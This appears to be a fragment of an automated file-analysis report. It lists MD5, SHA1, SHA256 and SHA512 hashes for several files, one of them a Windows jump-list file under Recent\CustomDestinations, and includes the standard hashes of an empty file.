SHA512 b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2
-
MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5 213ec77f56ab0691d0b4e8546031f143
SHA1 a49d41a230c3d246d2868d071670c28ea257b2f8
SHA256 fabd8ee78b221f077fb552296220957ffc79b09493bf18c7133abb6518c800b8
SHA512 8febcb5eb55d7969d8eba98293a138cb435993390db865eb06fe6a80c2ceb9c91f1174ab957f22f7e754fcc13733ca5ad871332ab8fb590600002b19637c8905
-
MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5 38ca099785e8d2627d2b4f2b77f74a5a
SHA1 96fb1a0e1573f5c05186c8d955ee3f04d3c7fed4
SHA256 6994850a1f465eaa42bdcb597334388b06ab4d2651f69d19ecddfa68939b35ab
SHA512 2315df429f5405ced24ae2129c3c0fb79df84bc5c6a9dde26255111e711c66c86d4ea34cfb0857dfca8912d12f459dbaa52424335188fef7257ac201cc10c76c
-
MD5 65eea99fef8efb737550c3b443894c87
SHA1 5b420915206645cdffac0f88e5df2c9e92a0e2f6
SHA256 98805952a1fae22c415327830501e2b3bdbfb449769e16cb6e5a367eb95f8607
SHA512 416a90aed8107b8837abcdcef1d23684d9c836031dc2fa590108d7858716645234a557cd5a76e41e0df83590b42199db4935151464d865b914f2c6828d7b1f61
-
MD5 0750828e5a80dae0280c43945332e145
SHA1 fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256 637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512 a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14
-
MD5 0941efccfdbde6a619081456be071102
SHA1 4d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA256 99dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512 bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab